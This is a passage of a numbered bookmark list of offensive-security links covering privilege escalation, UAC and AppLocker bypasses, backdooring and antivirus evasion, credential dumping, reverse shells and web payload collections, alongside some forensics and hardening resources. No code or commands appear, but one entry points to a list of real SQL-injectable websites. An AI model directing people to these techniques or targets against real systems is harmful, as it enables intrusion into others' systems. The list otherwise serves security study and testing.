https://medium.com/p/70dcb96e02b0
197-Microsoft Windows 10 - Child Process Restriction Mitigation Bypass:
https://www.exploit-db.com/download/44888.txt
-198-Microsoft Windows - Token Process Trust SID Access Check Bypass Privilege Escalation:
https://www.exploit-db.com/download/44630.txt
-199-Microsoft Word upload to Stored XSS:
https://www.n00py.io/2018/03/microsoft-word-upload-to-stored-xss/
-200-MobileApp-Pentest-Cheatsheet:
https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet
-201-awesome:
https://github.com/sindresorhus/awesome
-201-writing arm shellcode:
https://azeria-labs.com/writing-arm-shellcode/
-202-debugging with gdb introduction:
https://azeria-labs.com/debugging-with-gdb-introduction/
-203-emulate raspberrypi with qemu:
https://azeria-labs.com/emulate-raspberry-pi-with-qemu/
-204-Bash One-Liner to Check Your Password(s) via pwnedpasswords.com’s API Using the k-Anonymity Method:
https://medium.com/p/a5807a9a8056
-205-A Red Teamer's guide to pivoting:
https://artkond.com/2017/03/23/pivoting-guide/
-206-Using WebDAV features as a covert channel:
https://arno0x0x.wordpress.com/2017/09/07/using-webdav-features-as-a-covert-channel/
-207-A View of Persistence:
https://rastamouse.me/2018/03/a-view-of-persistence/
-208- pupy websocket transport:
https://bitrot.sh/post/28-11-2017-pupy-websocket-transport/
-209-Subdomains Enumeration Cheat Sheet:
https://pentester.land/cheatsheets/2018/11/.../subdomains-enumeration-cheatsheet.html
-210-DNS Reconnaissance – DNSRecon:
https://pentestlab.blog/2012/11/13/dns-reconnaissance-dnsrecon/
-211-Cheatsheets:
https://bitrot.sh/cheatsheet
-212-Understanding Guide to Nmap Firewall Scan (Part 2):
http://www.hackingarticles.in/understanding-guide-nmap-firewall-scan-part-2
-213-Exploit Office 2016 using CVE-2018-0802:
https://technologyredefine.blogspot.com/2018/01/exploit-office-2016-using-cve-2018-0802.html
-214-windows-exploit-suggester:
https://technologyredefine.blogspot.com/2018/01/windows-exploit-suggester.html
-215-INSTALLING PRESISTENCE BACKDOOR IN WINDOWS:
https://technologyredefine.blogspot.com/2018/01/installing-presistence-backdoor-in.html
-216-IDS, IPS AND FIREWALL EVASION USING NMAP:
https://technologyredefine.blogspot.com/2017/09/ids-ips-and-firewall-evasion-using-nmap.html
-217-Wireless Penetration Testing Checklist – A Detailed Cheat Sheet:
https://gbhackers.com/wireless-penetration-testing-checklist-a-detailed-cheat-sheet
218-Most Important Web Application Security Tools & Resources for Hackers and Security Professionals:
https://gbhackers.com/web-application-security-tools-resources
-219-Web Application Penetration Testing Checklist – A Detailed Cheat Sheet:
https://gbhackers.com/web-application-penetration-testing-checklist-a-detailed-cheat-sheet
-220-Top 500 Most Important XSS Script Cheat Sheet for Web Application Penetration Testing:
https://gbhackers.com/top-500-important-xss-cheat-sheet
-221-USBStealer – Password Hacking Tool For Windows Machine Applications:
https://gbhackers.com/pasword-hacking
-222-Most Important Mobile Application Penetration Testing Cheat sheet with Tools & Resources for Security Professionals:
https://gbhackers.com/mobile-application-penetration-testing
-223-Metasploit Can Be Directly Used For Hardware Penetration Testing Now:
https://gbhackers.com/metasploit-can-be-directly-used-for-hardware-vulnerability-testing-now
-224-How to Perform Manual SQL Injection While Pentesting With Single quote Error Based Parenthesis Method:
https://gbhackers.com/manual-sql-injection-2
-225-Email Spoo ng – Exploiting Open Relay configured Public Mailservers:
https://gbhackers.com/email-spoofing-exploiting-open-relay
-226-Email Header Analysis – Received Email is Genuine or Spoofed:
https://gbhackers.com/email-header-analysis
-227-Most Important Cyber Threat Intelligence Tools List For Hackers and Security Professionals:
https://gbhackers.com/cyber-threat-intelligence-tools
-228-Creating and Analyzing a Malicious PDF File with PDF-Parser Tool:
https://gbhackers.com/creating-and-analyzing-a-malicious-pdf-file-with-pdf-parser-tool
-229-Commix – Automated All-in-One OS Command Injection and Exploitation Tool:
https://gbhackers.com/commix-automated-all-in-one-os-command-injection-and-exploitation-tool
-230-Advanced ATM Penetration Testing Methods:
https://gbhackers.com/advanced-atm-penetration-testing-methods
-231-A8-Cross-Site Request Forgery (CSRF):
https://gbhackers.com/a8-cross-site-request-forgery-csrf
-232-Fully undetectable backdooring PE File:
https://haiderm.com/fully-undetectable-backdooring-pe-file/
-233-backdooring exe files:
https://haiderm.com/tag/backdooring-exe-files/
-234-From PHP (s)HELL to Powershell Heaven:
https://medium.com/p/da40ce840da8
-235-Forensic Investigation of Nmap Scan using Wireshark:
http://www.hackingarticles.in/forensic-investigation-of-nmap-scan-using-wireshark
-236-Unleashing an Ultimate XSS Polyglot:
https://github.com/0xsobky/HackVault/wiki
-237-wifi-arsenal:
https://github.com/0x90/wifi-arsenal
-238-XXE_payloads:
https://gist.github.com/staaldraad/01415b990939494879b4
-239-xss_payloads_2016:
https://github.com/7ioSecurity/XSS-Payloads/raw/master/xss_payloads_2016
-240-A curated list of awesome command-line frameworks, toolkits, guides and gizmos. Inspired by awesome-php.:
https://github.com/alebcay/awesome-shell
-241-The goal of this repository is to document the most common techniques to bypass AppLocker.:
https://github.com/api0cradle/UltimateAppLockerByPassList
-242-A curated list of CTF frameworks, libraries, resources and softwares:
https://github.com/apsdehal/awesome-ctf
-243-A collection of android security related resources:
https://github.com/ashishb/android-security-awesome
-244-OSX and iOS related security tools:
https://github.com/ashishb/osx-and-ios-security-awesome
-245-regexp-security-cheatsheet:
https://github.com/attackercan/regexp-security-cheatsheet
-246-PowerView-2.0 tips and tricks:
https://gist.github.com/HarmJ0y/3328d954607d71362e3c
-247-A curated list of awesome awesomeness:
https://github.com/bayandin/awesome-awesomeness
-248-Android App Security Checklist:
https://github.com/b-mueller/android_app_security_checklist
-249-Crack WPA/WPA2 Wi-Fi Routers with Airodump-ng and Aircrack-ng/Hashcat:
https://github.com/brannondorsey/wifi-cracking
-250-My-Gray-Hacker-Resources:
https://github.com/bt3gl/My-Gray-Hacker-Resources
-251-A collection of tools developed by other researchers in the Computer Science area to process network traces:
https://github.com/caesar0301/awesome-pcaptools
-252-A curated list of awesome Hacking tutorials, tools and resources:
https://github.com/carpedm20/awesome-hacking
-253-RFSec-ToolKit is a collection of Radio Frequency Communication Protocol Hacktools.:
https://github.com/cn0xroot/RFSec-ToolKit
-254-Collection of the cheat sheets useful for pentesting:
https://github.com/coreb1t/awesome-pentest-cheat-sheets
-255-Collection of the cheat sheets useful for pentesting:
https://github.com/coreb1t/awesome-pentest-cheat-sheets
-256-Collection of the cheat sheets useful for pentesting:
https://github.com/coreb1t/awesome-pentest-cheat-sheets
-257-A curated list of awesome forensic analysis tools and resources:
https://github.com/cugu/awesome-forensics
-258-Open-Redirect-Payloads:
https://github.com/cujanovic/Open-Redirect-Payloads
-259-A Threat hunter's playbook to aid the development of techniques and hypothesis for hunting campaigns.:
https://github.com/Cyb3rWard0g/ThreatHunter-Playbook
-260-Windows memory hacking library:
https://github.com/DarthTon/Blackbone
-261-A collective list of public JSON APIs for use in security.:
https://github.com/deralexxx/security-apis
-262-An authoritative list of awesome devsecops tools with the help from community experiments and contributions.:
https://github.com/devsecops/awesome-devsecops
-263-List of Awesome Hacking places, organised by Country and City, listing if it features power and wifi:
https://github.com/diasdavid/awesome-hacking-spots
-264-A comprehensive curated list of available Bug Bounty & Disclosure Programs and Write-ups:
https://github.com/djadmin/awesome-bug-bounty
-265-Notes for taking the OSCP in 2097:
https://github.com/dostoevskylabs/dostoevsky-pentest-notes
-266-A curated list of awesome Windows Exploitation resources, and shiny things. Inspired by awesom:
https://github.com/enddo/awesome-windows-exploitation
-267-A curated list of resources (books, tutorials, courses, tools and vulnerable applications) for learning about Exploit Development:
https://github.com/FabioBaroni/awesome-exploit-development
-268-A curated list of awesome reversing resources:
https://github.com/fdivrp/awesome-reversing
-269-Git All the Payloads! A collection of web attack payloads:
https://github.com/foospidy/payloads
-270-GitHub Project Resource List:
https://github.com/FuzzySecurity/Resource-List
-271-Use your macOS terminal shell to do awesome things.:
https://github.com/herrbischoff/awesome-macos-command-line
-272-Defeating Windows User Account Control:
https://github.com/hfiref0x/UACME
-273-Free Security and Hacking eBooks:
https://github.com/Hack-with-Github/Free-Security-eBooks
-274-Universal Radio Hacker: investigate wireless protocols like a boss:
https://github.com/jopohl/urh
-275-A curated list of movies every hacker & cyberpunk must watch:
https://github.com/k4m4/movies-for-hackers
-276-Various public documents, whitepapers and articles about APT campaigns:
https://github.com/kbandla/APTnotes
-277-A database of common, interesting or useful commands, in one handy referable form:
https://github.com/leostat/rtfm
-278-A curated list of tools for incident response:
https://github.com/meirwah/awesome-incident-response
-279-A curated list of awesome guides, tools, and other resources related to the security and compromise of locks, safes, and keys:
https://github.com/meitar/awesome-lockpicking
-280-A curated list of static analysis tools, linters and code quality checkers for various programming languages:
https://github.com/mre/awesome-static-analysis
-281-A Collection of Hacks in IoT Space so that we can address them (hopefully):
https://github.com/nebgnahz/awesome-iot-hacks
-281-A Course on Intermediate Level Linux Exploitation:
https://github.com/nnamon/linux-exploitation-course
-282-Kali Linux Cheat Sheet for Penetration Testers:
https://github.com/NoorQureshi/kali-linux-cheatsheet
-283-A curated list of awesome infosec courses and training resources.:
https://github.com/onlurking/awesome-infosec
-284-A curated list of resources for learning about application security:
https://github.com/paragonie/awesome-appsec
-285-an awesome list of honeypot resources:
https://github.com/paralax/awesome-honeypots
286-GitHub Enterprise SQL Injection:
https://www.blogger.com/share-post.g?blogID=2987759532072489303&postID=6980097238231152493
-287-A curated list of fuzzing resources ( Books, courses - free and paid, videos, tools, tutorials and vulnerable applications to practice on ) for learning Fuzzing and initial phases of Exploit Development like root cause analysis:
https://github.com/secfigo/Awesome-Fuzzing
-288-PHP htaccess injection cheat sheet:
https://github.com/sektioneins/pcc/wiki
-289-A curated list of the awesome resources about the Vulnerability Research:
https://github.com/sergey-pronin/Awesome-Vulnerability-Research
-290-A list of useful payloads and bypass for Web Application Security and Pentest/CTF:
https://github.com/swisskyrepo/PayloadsAllTheThings
-291-A collection of Red Team focused tools, scripts, and notes:
https://github.com/threatexpress/red-team-scripts
-292-Awesome XSS stuff:
https://github.com/UltimateHackers/AwesomeXSS
-293-A collection of hacking / penetration testing resources to make you better!:
https://github.com/vitalysim/Awesome-Hacking-Resources
-294-Docker Cheat Sheet:
https://github.com/wsargent/docker-cheat-sheet
-295-Decrypted content of eqgrp-auction-file.tar.xz:
https://github.com/x0rz/EQGRP
-296-A bunch of links related to Linux kernel exploitation:
https://github.com/xairy/linux-kernel-exploitation
-297-Penetration Testing 102 - Windows Privilege Escalation Cheatsheet:
www.exumbraops.com/penetration-testing-102-windows-privilege-escalation-cheatsheet
-298-Pentesting Cheatsheet:
https://anhtai.me/pentesting-cheatsheet/
-299-Windows Privilege Escalation Methods for Pentesters:
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
-300-Penetration Testing Cheat Sheet For Windows Machine – Intrusion Detection:
-301-Reading Your Way Around UAC (Part 1):
https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html
-302--Reading Your Way Around UAC (Part 2):
https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html
-303-Executing Metasploit & Empire Payloads from MS Office Document Properties (part 2 of 2):
https://stealingthe.network/executing-metasploit-empire-payloads-from-ms-office-document-properties-part-2-of-2/
-304-SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1:
https://medium.com/p/29d034c27978
-304-Automating Cobalt Strike,Aggressor Collection Scripts:
https://github.com/bluscreenofjeff/AggressorScripts
https://github.com/harleyQu1nn/AggressorScripts
-305-Vi Cheat Sheet:
https://highon.coffee/blog/vi-cheat-sheet/
-306-Network Recon Cheat Sheet:
https://www.cheatography.com/coffeefueled/cheat-sheets/network-recon/
-307-LFI Cheat Sheet:
https://highon.coffee/blog/lfi-cheat-sheet/
-308-Systemd Cheat Sheet:
https://highon.coffee/blog/systemd-cheat-sheet/
-309-Aircrack-ng Cheatsheet:
https://securityonline.info/aircrack-ng-cheatsheet/
-310-Kali Linux Cheat Sheet for Penetration Testers:
https://www.blackmoreops.com/?p=7212
-311-Wifi Pentesting Command Cheatsheet:
https://randomkeystrokes.com/2016/07/01/wifi-pentesting-cheatsheet/
-312-Android Testing Environment Cheatsheet (Part 1):
https://randomkeystrokes.com/2016/10/17/android-testing-environment-cheatsheet/
-313-cheatsheet:
https://randomkeystrokes.com/category/cheatsheet/
-314-Reverse Shell Cheat Sheet:
https://highon.coffee/blog/reverse-shell-cheat-sheet/
-315-Linux Commands Cheat Sheet:
https://highon.coffee/blog/linux-commands-cheat-sheet/
-316-Linux Privilege Escalation using Sudo Rights:
http://www.hackingarticles.in/linux-privilege-escalation-using-exploiting-sudo-rights
-317-Linux Privilege Escalation using Misconfigured NFS:
http://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/
-318-Linux Privilege Escalation by Exploiting Cronjobs:
http://www.hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-jobs/
-319-Web Penetration Testing:
http://www.hackingarticles.in/web-penetration-testing/
-320-Webshell to Meterpreter:
http://www.hackingarticles.in/webshell-to-meterpreter
-321-WordPress Penetration Testing using WPScan & Metasploit:
http://www.hackingarticles.in/wordpress-penetration-testing-using-wpscan-metasploit
-322-XSS Exploitation in DVWA (Bypass All Security):
http://www.hackingarticles.in/xss-exploitation-dvwa-bypass-security
-323-Linux Privilege Escalation Using PATH Variable:
http://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/
-324-VNC tunneling over SSH:
http://www.hackingarticles.in/vnc-tunneling-ssh
-325-VNC Pivoting through Meterpreter:
http://www.hackingarticles.in/vnc-pivoting-meterpreter
-326-Week of Evading Microsoft ATA - Announcement and Day 1:
https://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day1.html
-327-Abusing DNSAdmins privilege for escalation in Active Directory:
https://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html
-328-Using SQL Server for attacking a Forest Trust:
https://www.labofapenetrationtester.com/2017/03/using-sql-server-for-attacking-forest-trust.html
-329-Empire :
http://www.harmj0y.net/blog/category/empire/
-330-8 Deadly Commands You Should Never Run on Linux:
https://www.howtogeek.com/125157/8-deadly-commands-you-should-never-run-on-linux/
-331-External C2 framework for Cobalt Strike:
https://www.insomniacsecurity.com/2018/01/11/externalc2.html
-332-How to use Public IP on Kali Linux:
http://www.hackingarticles.in/use-public-ip-kali-linux
-333-Bypass Admin access through guest Account in windows 10:
http://www.hackingarticles.in/bypass-admin-access-guest-account-windows-10
-334-Bypass Firewall Restrictions with Metasploit (reverse_tcp_allports):
http://www.hackingarticles.in/bypass-firewall-restrictions-metasploit-reverse_tcp_allports
-335-Bypass SSH Restriction by Port Relay:
http://www.hackingarticles.in/bypass-ssh-restriction-by-port-relay
-336-Bypass UAC Protection of Remote Windows 10 PC (Via FodHelper Registry Key):
http://www.hackingarticles.in/bypass-uac-protection-remote-windows-10-pc-via-fodhelper-registry-key
-337-Bypass UAC in Windows 10 using bypass_comhijack Exploit:
http://www.hackingarticles.in/bypass-uac-windows-10-using-bypass_comhijack-exploit
-338-Bind Payload using SFX archive with Trojanizer:
http://www.hackingarticles.in/bind-payload-using-sfx-archive-trojanizer
-339-Capture NTLM Hashes using PDF (Bad-Pdf):
http://www.hackingarticles.in/capture-ntlm-hashes-using-pdf-bad-pdf
-340-Best of Post Exploitation Exploits & Tricks:
http://www.hackingarticles.in/best-of-post-exploitation-exploits-tricks/
-341-Detect SQL Injection Attack using Snort IDS:
http://www.hackingarticles.in/detect-sql-injection-attack-using-snort-ids/
-342-Beginner Guide to Website Footprinting:
http://www.hackingarticles.in/beginner-guide-website-footprinting/
-343-How to Enable and Monitor Firewall Log in Windows PC:
http://www.hackingarticles.in/enable-monitor-firewall-log-windows-pc/
-344-Wifi Post Exploitation on Remote PC:
http://www.hackingarticles.in/wifi-post-exploitation-remote-pc/
-335-Check Meltdown Vulnerability in CPU:
http://www.hackingarticles.in/check-meltdown-vulnerability-cpu
-336-XXE:
https://phonexicum.github.io/infosec/xxe.html
-337-[XSS] Re ected XSS Bypass Filter:
https://medium.com/p/de41d35239a3
-338-Engagement Tools Tutorial in Burp suite:
http://www.hackingarticles.in/engagement-tools-tutorial-burp-suite
-339-Wiping Out CSRF:
https://medium.com/@jrozner/wiping-out-csrf-ded97ae7e83f
-340-First entry: Welcome and fileless UAC bypass:
https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/
-341-Writing a Custom Shellcode Encoder:
https://medium.com/p/31816e767611
-342-Security Harden CentOS 7 :
https://highon.coffee/blog/security-harden-centos-7/
-343-THE BIG BAD WOLF - XSS AND MAINTAINING ACCESS:
https://www.paulosyibelo.com/2018/06/the-big-bad-wolf-xss-and-maintaining.html
-344-MySQL:
https://websec.ca/kb/CHANGELOG.txt
-345-Deobfuscation of VM based software protection:
http://shell-storm.org/talks/SSTIC2017_Deobfuscation_of_VM_based_software_protection.pdf
-346-Online Assembler and Disassembler:
http://shell-storm.org/online/Online-Assembler-and-Disassembler/
-347-Shellcodes database for study cases:
http://shell-storm.org/shellcode/
-348-Dynamic Binary Analysis and Obfuscated Codes:
http://shell-storm.org/talks/sthack2016-rthomas-jsalwan.pdf
-349-How Triton may help to analyse obfuscated binaries:
http://triton.quarkslab.com/files/misc82-triton.pdf
-350-Triton: A Concolic Execution Framework:
http://shell-storm.org/talks/SSTIC2015_English_slide_detailed_version_Triton_Concolic_Execution_FrameWork_FSaudel_JSalwan.pdf
-351-Automatic deobfuscation of the Tigress binary protection using symbolic execution and LLVM:
https://github.com/JonathanSalwan/Tigress_protection
-352-What kind of semantics information Triton can provide?:
http://triton.quarkslab.com/blog/What-kind-of-semantics-information-Triton-can-provide/
-353-Code coverage using a dynamic symbolic execution:
http://triton.quarkslab.com/blog/Code-coverage-using-dynamic-symbolic-execution/
-354-Triton (concolic execution framework) under the hood:
http://triton.quarkslab.com/blog/first-approach-with-the-framework/
-355-- Stack and heap overflow detection at runtime via behavior analysis and Pin:
http://shell-storm.org/blog/Stack-and-heap-overflow-detection-at-runtime-via-behavior-analysis-and-PIN/
-356-Binary analysis: Concolic execution with Pin and z3:
http://shell-storm.org/blog/Binary-analysis-Concolic-execution-with-Pin-and-z3/
-357-In-Memory fuzzing with Pin:
http://shell-storm.org/blog/In-Memory-fuzzing-with-Pin/
-358-Hackover 2015 r150 (outdated solving for Triton use cases):
https://github.com/JonathanSalwan/Triton/blob/master/src/examples/python/ctf-writeups/hackover-ctf-2015-r150/solve.py
-359-Skip sh – Web Application Security Scanner for XSS, SQL Injection, Shell injection:
https://gbhackers.com/skipfish-web-application-security-scanner
-360-Sublist3r – Tool for Penetration testers to Enumerate Sub-domains:
https://gbhackers.com/sublist3r-penetration-testers
-361-bypassing application whitelisting with bginfo:
https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
-362-accessing-clipboard-from-the-lock-screen-in-windows-10:
https://oddvar.moe/2017/01/24/accessing-clipboard-from-the-lock-screen-in-windows-10/
-363-bypassing-device-guard-umci-using-chm-cve-2017-8625:
https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/
-364-defense-in-depth-writeup:
https://oddvar.moe/2017/09/13/defense-in-depth-writeup/
-365-applocker-case-study-how-insecure-is-it-really-part-1:
https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
-366-empires-cross-platform-office-macro:
https://www.blackhillsinfosec.com/empires-cross-platform-office-macro/
-367-recon tools:
https://blackarch.org/recon.html
-368-Black Hat 2018 tools list:
https://medium.com/p/991fa38901da
-369-Application Introspection & Hooking With Frida:
https://www.fuzzysecurity.com/tutorials/29.html
-370-And I did OSCP!:
https://medium.com/p/589babbfea19
-371-CoffeeMiner: Hacking WiFi to inject cryptocurrency miner to HTML requests:
https://arnaucube.com/blog/coffeeminer-hacking-wifi-cryptocurrency-miner.html
-372-Most Important Endpoint Security & Threat Intelligence Tools List for Hackers and Security Professionals:
https://gbhackers.com/threat-intelligence-tools
-373-Penetration Testing Cheat Sheet For Windows Machine – Intrusion Detection:
https://techincidents.com/penetration-testing-cheat-sheet/
-374-privilege escalation:
https://toshellandback.com/category/privilege-escalation/
-375-The Complete List of Windows Post-Exploitation Commands (No Powershell):
https://medium.com/p/999b5433b61e
-376-The Art of Subdomain Enumeration:
https://blog.sweepatic.com/tag/subdomain-enumeration/
-377-The Principles of a Subdomain Takeover:
https://blog.sweepatic.com/subdomain-takeover-principles/
-378-The journey of Web Cache + Firewall Bypass to SSRF to AWS credentials compromise!:
https://medium.com/p/b250fb40af82
-379-The Solution for Web for Pentester-I:
https://medium.com/p/4c21b3ae9673
-380-The Ultimate Penetration Testing Command Cheat Sheet for Linux:
https://www.hackingloops.com/command-cheat-sheet-for-linux/
-381-: Ethical Hacking, Hack Tools, Hacking Tricks, Information Gathering, Penetration Testing, Recommended:
https://www.hackingloops.com/hacking-tricks/
-383-Introduction to Exploitation, Part 1: Introducing Concepts and Terminology:
https://www.hackingloops.com/exploitation-terminology/
-384-How Hackers Kick Victims Off of Wireless Networks:
https://www.hackingloops.com/kick-victims-off-of-wireless-networks/
-385-Maintaining Access Part 1: Introduction and Metasploit Example:
https://www.hackingloops.com/maintaining-access-metasploit/
-386-How to Steal Windows Credentials with Mimikatz and Metasploit:
https://www.hackingloops.com/mimikatz/
-387-Evading Anti-virus Part 2: Obfuscating Payloads with Msfvenom:
https://www.hackingloops.com/msfvenom/
-388-Evading Anti-virus Part 1: Infecting EXEs with Shellter:
https://www.hackingloops.com/evading-anti-virus-shellter/
-389-Mobile Hacking Part 4: Fetching Payloads via USB Rubber Ducky:
https://www.hackingloops.com/payloads-via-usb-rubber-ducky/
-390-Ethical Hacking Practice Test 6 – Footprinting Fundamentals Level1:
https://www.hackingloops.com/ethical-hacking-practice-test-6-footprinting-fundamentals-level1/
-391-Skip Cracking Responder Hashes and Relay Them:
https://threat.tevora.com/quick-tip-skip-cracking-responder-hashes-and-replay-them/
-392-Cracking NTLMv1 Handshakes with Crack.sh:
http://threat.tevora.com/quick-tip-crack-ntlmv1-handshakes-with-crack-sh/
-393-Top 3 Anti-Forensic OpSec Tips for Linux & A New Dead Man’s Switch:
https://medium.com/p/d5e92843e64a
-394-VNC Penetration Testing (Port 5901):
http://www.hackingarticles.in/vnc-penetration-testing
-395-Windows Privilege Escalation:
http://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalation
-396-Removing Sender’s IP Address From Email’s Received: From Header:
https://www.devside.net/wamp-server/removing-senders-ip-address-from-emails-received-from-header
-397-Dump Cleartext Password in Linux PC using MimiPenguin:
http://www.hackingarticles.in/dump-cleartext-password-linux-pc-using-mimipenguin
-398-Embedded Backdoor with Image using FakeImageExploiter:
http://www.hackingarticles.in/embedded-backdoor-image-using-fakeimageexploiter
-399-Exploit Command Injection Vulnearbility with Commix and Netcat:
http://www.hackingarticles.in/exploit-command-injection-vulnearbility-commix-netcat
-400-Exploiting Form Based Sql Injection using Sqlmap:
http://www.hackingarticles.in/exploiting-form-based-sql-injection-using-sqlmap
-401-Beginner Guide to impacket Tool kit:
http://www.hackingarticles.in/beginner-guide-to-impacket-tool-kit
-402-Best of Post Exploitation Exploits & Tricks:
http://www.hackingarticles.in/best-of-post-exploitation-exploits-tricks
-403-Command Injection to Meterpreter using Commix:
http://www.hackingarticles.in/command-injection-meterpreter-using-commix
-404-Comprehensive Guide to Crunch Tool:
http://www.hackingarticles.in/comprehensive-guide-to-crunch-tool
-405-Compressive Guide to File Transfer (Post Exploitation):
http://www.hackingarticles.in/compressive-guide-to-file-transfer-post-exploitation
-406-Crack Wifi Password using Aircrack-Ng (Beginner’s Guide):
http://www.hackingarticles.in/crack-wifi-password-using-aircrack-ng
-407-How to Detect Meterpreter in Your PC:
http://www.hackingarticles.in/detect-meterpreter-pc
-408-Easy way to Hack Database using Wizard switch in Sqlmap:
http://www.hackingarticles.in/easy-way-hack-database-using-wizard-switch-sqlmap
-409-Exploiting the Webserver using Sqlmap and Metasploit (OS-Pwn):
http://www.hackingarticles.in/exploiting-webserver-using-sqlmap-metasploit-os-pwn
-410-Create SSL Certified Meterpreter Payload using MPM:
http://www.hackingarticles.in/exploit-remote-pc-ssl-certified-meterpreter-payload-using-mpm
-411-Port forwarding: A practical hands-on guide:
https://www.abatchy.com/2017/01/port-forwarding-practical-hands-on-guide
-412-Exploit Dev 101: Jumping to Shellcode:
https://www.abatchy.com/2017/05/jumping-to-shellcode.html
-413-Introduction to Manual Backdooring:
https://www.abatchy.com/2017/05/introduction-to-manual-backdooring_24.html
-414-Kernel Exploitation:
https://www.abatchy.com/2018/01/kernel-exploitation-1
-415-Exploit Dev 101: Bypassing ASLR on Windows:
https://www.abatchy.com/2017/06/exploit-dev-101-bypassing-aslr-on.html
-416-Shellcode reduction tips (x86):
https://www.abatchy.com/2017/04/shellcode-reduction-tips-x86
-417-OSCE Study Plan:
https://www.abatchy.com/2017/03/osce-study-plan
-418-[DefCamp CTF Qualification 2017] Don't net, kids! (Revexp 400):
https://www.abatchy.com/2017/10/defcamp-dotnot
-419-DRUPAL 7.X SERVICES MODULE UNSERIALIZE() TO RCE:
https://www.ambionics.io/
-420-SQL VULNERABLE WEBSITES LIST 2017 [APPROX 2500 FRESH SQL VULNERABLE SITES]:
https://www.cityofhackerz.com/sql-vulnerable-websites-list-2017
-421-Windows IR Live Forensics Cheat Sheet:
https://www.cheatography.com/tag/forensics/
-422-windows-kernel-logic-bug-class-access:
https://googleprojectzero.blogspot.com/2019/03/windows-kernel-logic-bug-class-access.html
-423-injecting-code-into-windows-protected:
https://googleprojectzero.blogspot.com/2018/11/injecting-code-into-windows-protected.html
-424-USING THE DDE ATTACK WITH POWERSHELL EMPIRE:
https://1337red.wordpress.com/using-the-dde-attack-with-powershell-empire
-425-Automated Derivative Administrator Search:
https://wald0.com/?p=14
-426-A Red Teamer’s Guide to GPOs and OUs:
https://wald0.com/?p=179
-427-Pen Testing and Active Directory, Part VI: The Final Case:
https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/
-428-Offensive Tools and Techniques:
https://www.sec.uno/2017/03/01/offensive-tools-and-techniques/
-429-Three penetration testing tips to out-hack hackers:
http://infosechotspot.com/three-penetration-testing-tips-to-out-hack-hackers-betanews/
-430-Introducing BloodHound:
https://wald0.com/?p=68
-431-Red + Blue = Purple:
http://www.blackhillsinfosec.com/?p=5368
-432-Active Directory Access Control List – Attacks and Defense – Enterprise Mobility and Security Blog:
https://blogs.technet.microsoft.com/enterprisemobility/2017/09/18/active-directory-access-control-list-attacks-and-defense/
-433-PrivEsc: Unquoted Service Path:
https://www.gracefulsecurity.com/privesc-unquoted-service-path/
-434-PrivEsc: Insecure Service Permissions:
https://www.gracefulsecurity.com/privesc-insecure-service-permissions/
-435-PrivEsc: DLL Hijacking:
https://www.gracefulsecurity.com/privesc-dll-hijacking/
-436-Android Reverse Engineering 101 – Part 1:
http://www.fasteque.com/android-reverse-engineering-101-part-1/
-437-Luckystrike: An Evil Office Document Generator:
https://www.shellntel.com/blog/2016/9/13/luckystrike-a-database-backed-evil-macro-generator
-438-the-number-one-pentesting-tool-youre-not-using:
https://www.shellntel.com/blog/2016/8/3/the-number-one-pentesting-tool-youre-not-using
-439-uac-bypass:
http://www.securitynewspaper.com/tag/uac-bypass/
-440-XSSer – Automated Framework Tool to Detect and Exploit XSS vulnerabilities:
https://gbhackers.com/xsser-automated-framework-detectexploit-report-xss-vulnerabilities
-441-Penetration Testing on X11 Server:
http://www.hackingarticles.in/penetration-testing-on-x11-server
-442-Always Install Elevated:
https://pentestlab.blog/2017/02/28/always-install-elevated
-443-Scanning for Active Directory Privileges & Privileged Accounts:
https://adsecurity.org/?p=3658
-444-Windows Server 2016 Active Directory Features:
https://adsecurity.org/?p=3646
-445-powershell:
https://adsecurity.org/?tag=powershell
-446-PowerShell Security: PowerShell Attack Tools, Mitigation, & Detection:
https://adsecurity.org/?p=2921
-447-DerbyCon 6 (2016) Talk – Attacking EvilCorp: Anatomy of a Corporate Hack:
https://adsecurity.org/?p=3214
-448-Real-World Example of How Active Directory Can Be Compromised (RSA Conference Presentation):
https://adsecurity.org/?p=2085
-449-Advanced ATM Penetration Testing Methods:
https://gbhackers.com/advanced-atm-penetration-testing-methods
-450-Background: Microsoft Ofice Exploitation:
https://rhinosecuritylabs.com/research/abusing-microsoft-word-features-phishing-subdoc/
-451-Automated XSS Finder:
https://medium.com/p/4236ed1c6457
-452-Application whitelist bypass using XLL and embedded shellcode:
https://rileykidd.com/.../application-whitelist-bypass-using-XLL-and-embedded-shellc
-453-AppLocker Bypass – Regsvr32:
https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32
-454-Nmap Scans using Hex Value of Flags:
http://www.hackingarticles.in/nmap-scans-using-hex-value-flags
-455-Nmap Scan with Timing Parameters:
http://www.hackingarticles.in/nmap-scan-with-timing-parameters
-456-OpenSSH User Enumeration Time- Based Attack with Osueta:
http://www.hackingarticles.in/openssh-user-enumeration-time-based-attack-osueta
-457-Penetration Testing:
http://www.hackingarticles.in/web-penetration-testing/
-458-Penetration Testing on Remote Desktop (Port 3389):
http://www.hackingarticles.in/penetration-testing-remote-desktop-port-3389
-459-Penetration Testing on Telnet (Port 23):
http://www.hackingarticles.in/penetration-testing-telnet-port-23
-460-Penetration Testing in Windows/Active Directory with Crackmapexec:
http://www.hackingarticles.in/penetration-testing-windowsactive-directory-crackmapexec
-461-Penetration Testing in WordPress Website using WordPress Exploit Framework:
http://www.hackingarticles.in/penetration-testing-wordpress-website-using-wordpress-exploit-framework
-462-Port Scanning using Metasploit with IPTables:
http://www.hackingarticles.in/port-scanning-using-metasploit-iptables
-463-Post Exploitation Using WMIC (System Command):
